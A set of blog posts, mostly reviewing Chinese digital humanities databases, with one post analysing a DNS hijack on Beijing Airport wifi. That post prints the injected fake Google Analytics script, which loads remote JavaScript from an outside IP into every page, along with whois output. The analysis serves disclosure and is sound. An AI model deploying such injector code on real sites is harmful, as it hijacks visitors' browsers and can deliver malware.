China Biographical Database

The China Biographical Database Project (CBDB) describes itself as “an online relational database with biographical information about approximately 328,000 individuals as of May 2014, primarily from the 7th through 19th centuries”. A joint project of Harvard’s Fairbank Center for Chinese Studies, Academia Sinica’s Institute of History and Philology, and Peking University’s Center for Research on Ancient Chinese History, the project’s relatively compact website belies an extraordinary wealth of structured data that is available for download in the form of an Access database, and can also be directly queried using an API.

The level of detail included in the database is quite astounding – and, crucially for this kind of material, the data is carefully structured such that many kinds of complex queries for specific types of information are possible.



The underlying tables that store the information can also be accessed directly to construct complex queries, or to export subsets of the data:

A simple public API is also offered that allows direct querying of the data and returns either human-readable HTML or structured data in XML or JSON. At present the only supported queries for this API appear to be names in Chinese or Pinyin and record number, which significantly limits its flexibility versus the Access database, but for applications where these queries are sufficient it provides a very neat way of accessing the data in a structured format. According to the site, at least four other projects are currently making use of the API.

Surprisingly even though the entire database is made freely available for download I found no explicit license or statement as to acceptable reuse of the data, other than the generic copyright notice at the bottom of the website, so it is unclear whether it is intended to be open source, though it is clearly open access.

Posted in Digital humanities | Leave a comment

Beijing Airport Wifi hacked: DNS attack pushes adverts to sites via Google Analytics

While at Beijing Airport recently, I connected to the official airport wifi service, and noticed something strange when visiting ctext.org:

A large floating advert had appeared at the bottom right of every page of the site, obscuring much of the content.

Could the site have been hacked? I searched the HTML source for unusual Javascript or Iframe additions, but there weren’t any – all the code included should have been legitimate. Only one inclusion was not from ctext.org: the standard Google Analytics code, which loads asynchronously from http://www.google-analytics.com/ga.js. Let’s take a look at that file when retrieved over Beijing Airport wifi:

location_sign="jc";
var sign = new Error('log').stack;
var regx = /.*\/(.*?\.js.*?)/;
if(sign)
{
	var group = sign.match(regx);
	if(group)
	{
		var s = group[1];
	}
}
var url = "http://121.40.180.161/ad.js?" + s;
var jsNode = document.createElement('script');
jsNode.setAttribute('src',url);
if(document.body)
{
	if(document.body.appendChild)
	{
		document.body.appendChild(jsNode);
	}
}
else
{
	var head = document.getElementsByTagName('head').item(0);
	if(head.appendChild)
	{
		head.appendChild(jsNode);
	}
}

This code basically says something like “fetch an advert from 121.40.180.161 and attach it to this webpage” – definitely not what Google Analytics ought to be doing. So why is this happening?

home:~ user$ ping www.google-analytics.com
PING www-google-analytics.l.google.com (203.208.40.133): 56 data bytes
64 bytes from 203.208.40.133: icmp_seq=0 ttl=58 time=36.207 ms
64 bytes from 203.208.40.133: icmp_seq=1 ttl=58 time=38.659 ms

OK, so www.google-analytics.com is resolving to 203.208.40.133… who does that belong to?

home:~ user$ whois 203.208.40.133

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#


#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 203.208.40.133"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=203.208.40.133?showDetails=true&showARIN=false&ext=netref2
#

NetRange:       203.0.0.0 - 203.255.255.255
CIDR:           203.0.0.0/8
NetName:        APNIC-203
NetHandle:      NET-203-0-0-0-1
Parent:          ()
NetType:        Allocated to APNIC
OriginAS:
Organization:   Asia Pacific Network Information Centre (APNIC)
RegDate:        1994-04-05
Updated:        2010-08-02
Comment:        This IP address range is not registered in the ARIN database.
Comment:        For details, refer to the APNIC Whois Database via
Comment:        WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:        ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:        for the Asia Pacific region. APNIC does not operate networks
Comment:        using this IP address range and is not able to investigate
Comment:        spam or abuse reports relating to these addresses. For more
Comment:        help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
Ref:            http://whois.arin.net/rest/net/NET-203-0-0-0-1

OrgName:        Asia Pacific Network Information Centre
OrgId:          APNIC
Address:        PO Box 3646
City:           South Brisbane
StateProv:      QLD
PostalCode:     4101
Country:        AU
RegDate:
Updated:        2012-01-24
Ref:            http://whois.arin.net/rest/org/APNIC

ReferralServer: whois://whois.apnic.net

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net
OrgTechRef:    http://whois.arin.net/rest/poc/AWC12-ARIN

OrgAbuseHandle: AWC12-ARIN
OrgAbuseName:   APNIC Whois Contact
OrgAbusePhone:  +61 7 3858 3188
OrgAbuseEmail:  search-apnic-not-arin@apnic.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/AWC12-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '203.208.32.0 - 203.208.63.255'

inetnum:        203.208.32.0 - 203.208.63.255
netname:        GOOGLECN
descr:          Beijing Gu Xiang Information Technology Co.,Ltd.
descr:          Bldg 6, No.1 Zhongguancun East Rd, Beijing
country:        CN
admin-c:        ZM657-AP
tech-c:         ZM657-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
changed:        ipas@cnnic.cn 20110412
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.cn 20110428
source:         APNIC

person:         GOOGLECN Contact
address:        Kejian Building
address:        Tsinghua Science Park Building 6
address:        No. 1 Zhongguancun East Road
address:        Haidian District
address:        Beijing P.R. China 100084
country:        CN
phone:          +86-10-62503000
fax-no:         +86-10-62503001
e-mail:         cnnic-contact@google.com
nic-hdl:        ZM657-AP
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.net 20110426
source:         APNIC

% Information related to '203.208.40.0/23AS24424'

route:          203.208.40.0/23
descr:          FM SITE5
origin:         AS24424
notify:         nst@corp.ganji.com
mnt-by:         MAINT-CNNIC-AP
changed:        nst@corp.ganji.com 20060612
source:         APNIC

% This query was served by the APNIC Whois Service version 1.69.1-APNICv1r3 (WHOIS4)

Huh. That’s strange – the IP serving the fake Analytics code is actually allocated to GOOGLECN, registered to Google’s office in Beijing. What’s up with that? There’s definitely something funny going on here, presumably relating to the last part of the query response about 203.208.40.0/23 ultimately belonging to “FM SITE5” and perhaps being associated with ganji.com.

Anyway, it looks like what is happening is that someone is altering the DNS response for www.google-analytics.com to point to a server they control so they can display adverts on other people’s websites – in fact on any website that uses Google Analytics. For example:

It has to be said that this is a pretty good scam. After all, unless users are already familiar with the site they are visiting, they may simply assume that the adverts are legitimate ones run by the owners of these sites, while the profits go to the scammer and the site owner remains unaware that anything has happened. So who’s the scammer? Assuming this scam does not originate with someone at Google China or Beijing Airport, it seems most likely that someone’s router has been hacked, as has recently been reported elsewhere:

The scary thing about this is that the malicious code can easily be set to do all sorts of things – displaying adverts is relatively benign compared to popups appearing to come from legitimate and trusted sites that trick users into downloading malware-ridden software or direct attacks on known browser weaknesses, for instance. By compromising routers that service large numbers of users – airport wifi being an excellent example – scams taking advantage of Google Analytics code can quickly affect large numbers of people. Since from a user perspective the genuine Analytics code has no visible effect, its replacement with malicious code can be easily overlooked.

Posted in Off topic | Comments Off on Beijing Airport Wifi hacked: DNS attack pushes adverts to sites via Google Analytics

HK Visa Online Application Status Enquiry – Invalid Reference Number

This post is a little off-topic, but perhaps will help people Googling with the same problem.

A trivial issue nearly prevented me from being able to determine the status of my Hong Kong visa application online. The reference number I’d been given was of the form XXXX-nnnn-nn – four letters, four digits, then another two digits:

When I tried submitting the code exactly as (hand-)written on my receipt, the system told me the number was invalid:

For some reason the programmer in me thought, “surely it couldn’t be that the fields have to be zero padded?” – so I tried adding zeros to the middle field until the form would allow no more. Now displaying “XXXX-000nnnn-nn”, I submitted the form, and was amazed to see that it worked! Presumably the software makes a string comparison even for the numeric fields, so the reference number must have exactly 7 digits in the middle field:

In my case it turned out that being able to check online was very useful, as nobody was answering the phone at the relevant immigration department, and once I was finally able to check online, I discovered that my application was already approved and ready to collect.

I couldn’t find any mention of this in the instructions, and it certainly wasn’t obvious from the error message (I’d assumed that my application must by of the “not supported” type) – perhaps this report will help someone else check their status (or help someone at the immigration department fix their software/error message).

Posted in Off topic | Leave a comment

Ming Qing Women’s Writings

The Ming Qing Women’s Writings (明清婦女著作) site provides a carefully curated database of women’s writing from the Ming, Qing, and Republican periods of Chinese history. The database contains a wealth of information about authors and individual texts (and poems) within individual works. The online version also includes facsimiles of all the corresponding texts that can be navigated using this extensive set of data.

While all of this data can be conveniently searched online in Chinese or Pinyin, it is also possible to download the entire data set in MS Access format.

Encouragingly the site seems to have been actively maintained (“last update: December 2014”), and is currently part of a research project going on until at least 2016.

Posted in Digital humanities | Comments Off on Ming Qing Women’s Writings

CHinese ANcient Texts (CHANT) update

The Chinese University of Hong Kong’s subscription-based CHinese ANcient Texts (CHANT) website has recently undergone some renovation. The new interface appears to largely follow the layout and functionality of the previous version, although there seem to be a few puzzling changes, such as the omission of source text explanations and lists of emendations, both of which were previously available at least for most texts in the Pre-Qin and Han section. A new feature is the option to display a text with or without the corrections applied to it, by clicking the new “校改” and “原文” buttons.

The site now makes extensive use of Javascript to fetch pages, which can be frustrating as there is no page load indication. A huge benefit of the new site however is that the annotations finally display correctly on browsers other than Internet Explorer.

Coinciding with the change, it has become possible (at least at the institution that I’m based at) to access more areas of the database, though it’s unclear whether this is due to an accidental change, a policy decision, or the library paying a higher subscription rate.

Posted in Digital humanities | Comments Off on CHinese ANcient Texts (CHANT) update